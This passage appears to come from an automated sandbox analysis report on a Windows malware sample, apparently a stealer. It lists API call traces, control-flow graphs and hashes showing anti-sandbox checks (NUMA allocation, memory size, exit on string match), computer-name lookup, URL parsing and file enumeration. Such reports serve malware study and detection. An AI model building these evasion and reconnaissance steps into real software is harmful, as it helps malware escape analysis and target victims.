                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowswsprintf
                              • String ID: :\$C
                              • API String ID: 2572753744-3309953409
                              • Opcode ID: f508c66b1a9937da12302cf8f88a6a79870f80b4af132aa4d772bbe447a7ab82
                              • Instruction ID: 09296c0490717566420218e3e72328f127d01a86ac434bbd3c7aa25c8eac9feb
                              • Opcode Fuzzy Hash: f508c66b1a9937da12302cf8f88a6a79870f80b4af132aa4d772bbe447a7ab82
                              • Instruction Fuzzy Hash: 613170B1D082099FCB05CFB889899EFBFBCEF58714F100169E605F7650E6349A408BA5

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2793 394bc0-394bce 2794 394bd0-394bd5 2793->2794 2794->2794 2795 394bd7-394c48 ??2@YAPAXI@Z * 3 lstrlen InternetCrackUrlA call 392a20 2794->2795
                              APIs
                              • ??2@YAPAXI@Z.MSVCRT(00000800,?), ref: 00394BF7
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00394C01
                              • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00394C0B
                              • lstrlen.KERNEL32(?,00000000,?), ref: 00394C1F
                              • InternetCrackUrlA.WININET(?,00000000), ref: 00394C27
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ??2@$CrackInternetlstrlen
                              • String ID: <
                              • API String ID: 1683549937-4251816714
                              • Opcode ID: af3d2f69d29b8903b705c8f3a1191530871d1e9309cbf9542bfe8499bf25138c
                              • Instruction ID: 8a7d6a641b0e096cf79eebf5dcd3da70bf3e55bf52ca2a3a9dac998865c28d12
                              • Opcode Fuzzy Hash: af3d2f69d29b8903b705c8f3a1191530871d1e9309cbf9542bfe8499bf25138c
                              • Instruction Fuzzy Hash: 49011B71D00218AFDB10DFA8E845B9EBBA8AB18324F00416AF954E7290EB7459058BD4

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2798 391030-391055 GetCurrentProcess VirtualAllocExNuma 2799 39105e-39107b VirtualAlloc 2798->2799 2800 391057-391058 ExitProcess 2798->2800 2801 39107d-391080 2799->2801 2802 391082-391088 2799->2802 2801->2802 2803 39108a-3910ab VirtualFree 2802->2803 2804 3910b1-3910b6 2802->2804 2803->2804
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00391046
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 0039104D
                              • ExitProcess.KERNEL32 ref: 00391058
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0039106C
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003910AB
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                              • String ID:
                              • API String ID: 3477276466-0
                              • Opcode ID: ee78181e01df00251870ca690b26d6e012b73cc241c9e8db04e736f2182b7131
                              • Instruction ID: 91e0d5a3d5508656af8e3fbc2c3915dd4a6fbf71f7478b4d903b8c7a5f424f66
                              • Opcode Fuzzy Hash: ee78181e01df00251870ca690b26d6e012b73cc241c9e8db04e736f2182b7131
                              • Instruction Fuzzy Hash: 6301F471780204BFEB204A656C1EF6B7BADA794B05F208018F708F73C0D9B2E904A664

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2805 3aee90-3aeeb5 call 392930 2808 3aeec9-3aeecd call 396c40 2805->2808 2809 3aeeb7-3aeebf 2805->2809 2812 3aeed2-3aeee8 StrCmpCA 2808->2812 2809->2808 2810 3aeec1-3aeec3 lstrcpy 2809->2810 2810->2808 2813 3aeeea-3aef02 call 392a20 call 392930 2812->2813 2814 3aef11-3aef18 call 392a20 2812->2814 2823 3aef04-3aef0c 2813->2823 2824 3aef45-3aefa0 call 392a20 * 10 2813->2824 2819 3aef20-3aef28 2814->2819 2819->2819 2821 3aef2a-3aef37 call 392930 2819->2821 2821->2824 2830 3aef39 2821->2830 2823->2824 2826 3aef0e-3aef0f 2823->2826 2829 3aef3e-3aef3f lstrcpy 2826->2829 2829->2824 2830->2829
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 003AEEC3
                              • StrCmpCA.SHLWAPI(?,ERROR), ref: 003AEEDE
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 003AEF3F
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy
                              • String ID: ERROR
                              • API String ID: 3722407311-2861137601
                              • Opcode ID: 143ea4590529aaeb12248a7ca2ca460ac6ac35602fbf7675527eff238592b93e
                              • Instruction ID: c425b5ea538a1cc0520abeefedd45a324ad7f0652d599a4f2ebf2c9ea4764161
                              • Opcode Fuzzy Hash: 143ea4590529aaeb12248a7ca2ca460ac6ac35602fbf7675527eff238592b93e
                              • Instruction Fuzzy Hash: 1221FF31621606AFCF27BF79D84AA9F37A4EF11300F055428B84ADF252DE30DC248794

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2886 3910c0-3910cb 2887 3910d0-3910dc 2886->2887 2889 3910de-3910f3 GlobalMemoryStatusEx 2887->2889 2890 391112-391114 ExitProcess 2889->2890 2891 3910f5-391106 2889->2891 2892 391108 2891->2892 2893 39111a-39111d 2891->2893 2892->2890 2894 39110a-391110 2892->2894 2894->2890 2894->2893
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitGlobalMemoryProcessStatus
                              • String ID: @
                              • API String ID: 803317263-2766056989
                              • Opcode ID: 81c4d24e50e58d8ac3ebda2b0a61026443310a6d46112cc17837bc89f375ba48
                              • Instruction ID: 9b385c6f48681c46c23bde60d4bf7679efdcc65c78e5f80f2798b4ca10fb0634
                              • Opcode Fuzzy Hash: 81c4d24e50e58d8ac3ebda2b0a61026443310a6d46112cc17837bc89f375ba48
                              • Instruction Fuzzy Hash: 61F05C701183476BEF516A64DC0E72FF7D8EB10350F100929DE9BE2280E230C840D127

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2895 3a8c88-3a8cc4 StrCmpCA 2897 3a8ccd-3a8ce6 2895->2897 2898 3a8cc6-3a8cc7 ExitProcess 2895->2898 2900 3a8cec-3a8cf1 2897->2900 2901 3a8ee2-3a8eef call 392a20 2897->2901 2902 3a8cf6-3a8cf9 2900->2902 2904 3a8cff 2902->2904 2905 3a8ec3-3a8edc 2902->2905 2907 3a8d5a-3a8d69 lstrlen 2904->2907 2908 3a8dbd-3a8dcb StrCmpCA 2904->2908 2909 3a8ddd-3a8deb StrCmpCA 2904->2909 2910 3a8dfd-3a8e0b StrCmpCA 2904->2910 2911 3a8e1d-3a8e2b StrCmpCA 2904->2911 2912 3a8e3d-3a8e4b StrCmpCA 2904->2912 2913 3a8d30-3a8d3f lstrlen 2904->2913 2914 3a8e56-3a8e64 StrCmpCA 2904->2914 2915 3a8e88-3a8e9a lstrlen 2904->2915 2916 3a8e6f-3a8e7d StrCmpCA 2904->2916 2917 3a8d06-3a8d15 lstrlen 2904->2917 2918 3a8d84-3a8d92 StrCmpCA 2904->2918 2919 3a8da4-3a8db8 StrCmpCA 2904->2919 2905->2901 2945 3a8cf3 2905->2945 2933 3a8d6b-3a8d70 call 392a20 2907->2933 2934 3a8d73-3a8d7f call 392930 2907->2934 2908->2905 2920 3a8dd1-3a8dd8 2908->2920 2909->2905 2921 3a8df1-3a8df8 2909->2921 2910->2905 2922 3a8e11-3a8e18 2910->2922 2911->2905 2923 3a8e31-3a8e38 2911->2923 2912->2905 2924 3a8e4d-3a8e54 2912->2924 2931 3a8d49-3a8d55 call 392930 2913->2931 2932 3a8d41-3a8d46 call 392a20 2913->2932 2914->2905 2927 3a8e66-3a8e6d 2914->2927 2929 3a8e9c-3a8ea1 call 392a20 2915->2929 2930 3a8ea4-3a8eb0 call 392930 2915->2930 2916->2905 2928 3a8e7f-3a8e86 2916->2928 2925 3a8d1f-3a8d2b call 392930 2917->2925 2926 3a8d17-3a8d1c call 392a20 2917->2926 2918->2905 2936 3a8d98-3a8d9f 2918->2936 2919->2905 2920->2905 2921->2905 2922->2905 2923->2905 2924->2905 2954 3a8eb3-3a8eb5 2925->2954 2926->2925 2927->2905 2928->2905 2929->2930 2930->2954 2931->2954 2932->2931 2933->2934 2934->2954 2936->2905 2945->2902 2954->2905 2955 3a8eb7-3a8eb9 2954->2955 2955->2905 2956 3a8ebb-3a8ebd lstrcpy 2955->2956 2956->2905
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExitProcess
                              • String ID: block
                              • API String ID: 621844428-2199623458
                              • Opcode ID: d8f086fb5b71e735444fb5a8c4264d334845832f2b8d107963d6b4d6bc61ae2f
                              • Instruction ID: 49e27ab6be9d79dbe844e9ec9b6a8c83e72dba8ea5662480c53fe2cd5f4451f3
                              • Opcode Fuzzy Hash: d8f086fb5b71e735444fb5a8c4264d334845832f2b8d107963d6b4d6bc61ae2f
                              • Instruction Fuzzy Hash: 74E0922940424AEFC7119FB98C6CD82FBA9EF5A300B450999E6006F650D630FC85D7A6

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2957 3b2ad0-3b2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 3b2b44-3b2b59 2957->2958 2959 3b2b24-3b2b36 2957->2959
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003B2AFF
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B2B06
                              • GetComputerNameA.KERNEL32(00000000,00000104), ref: 003B2B1A
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: b0b27ce8b3439c12b7c334b82d0545673f64d4bdc781f87e9a5fd5b81294d671
                              • Instruction ID: 325ce86a65605f4903ea1a465e65fe4d29faa76375e27547d0ad693a06032e46
                              • Opcode Fuzzy Hash: b0b27ce8b3439c12b7c334b82d0545673f64d4bdc781f87e9a5fd5b81294d671
                              • Instruction Fuzzy Hash: 6001D676A44608AFC710CF99EC49BDEF7B8F744B21F00026AFA19E3780D774590487A1
                              APIs
                              • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00391046
                              • VirtualAllocExNuma.KERNEL32(00000000), ref: 0039104D
                              • ExitProcess.KERNEL32 ref: 00391058
                              • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 0039106C
                              • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003910AB
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                              • String ID:
                              • API String ID: 3477276466-0
                              • Opcode ID: cf0bb41e89ac9e73a50165e4c40e089c5e8a1319048d7c46a22c19a80780a4ee
                              • Instruction ID: 5fb8650d64a7433bd10965f34c9240f99d74fbe47c1f8b86c63a6a1ab4ea98d3
                              • Opcode Fuzzy Hash: cf0bb41e89ac9e73a50165e4c40e089c5e8a1319048d7c46a22c19a80780a4ee
                              • Instruction Fuzzy Hash: 73E0EC70248345BFE62157A59C8EF167FACAF52B01F144845F205FB0D1D6A5B404EB65
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003A23D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A23F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003A2402
                              • lstrlen.KERNEL32(\*.*), ref: 003A240D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A242A
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 003A2436
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003A246A
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 003A2486
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                              • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: \*.*
                              • API String ID: 2567437900-1173974218
                              • Opcode ID: edb46d11f75c52f09b0e5dad67d5396f5e3f116188ae81548e95c65df9150f3d
                              • Instruction ID: 4accb0b2269c2a90400a434b90588b3556c206969f4d8b6ac51be5658c7b14bf
                              • Opcode Fuzzy Hash: edb46d11f75c52f09b0e5dad67d5396f5e3f116188ae81548e95c65df9150f3d
                              • Instruction Fuzzy Hash: 4BA25C31912A16AFCB22AF69DC89EAF77B9EF15700F064168F806E7251DB34DD05CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003916E2
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00391719
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039176C
                              • lstrcat.KERNEL32(00000000), ref: 00391776
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003917A2
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003917EF
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003917F9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391825
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391875
                              • lstrcat.KERNEL32(00000000), ref: 0039187F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003918AB
                              • lstrcpy.KERNEL32(00000000,?), ref: 003918F3
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003918FE
                              • lstrlen.KERNEL32(003C1794), ref: 00391909
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00391929
                              • lstrcat.KERNEL32(00000000,003C1794), ref: 00391935
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039195B
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00391966
                              • lstrlen.KERNEL32(\*.*), ref: 00391971
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 0039198E
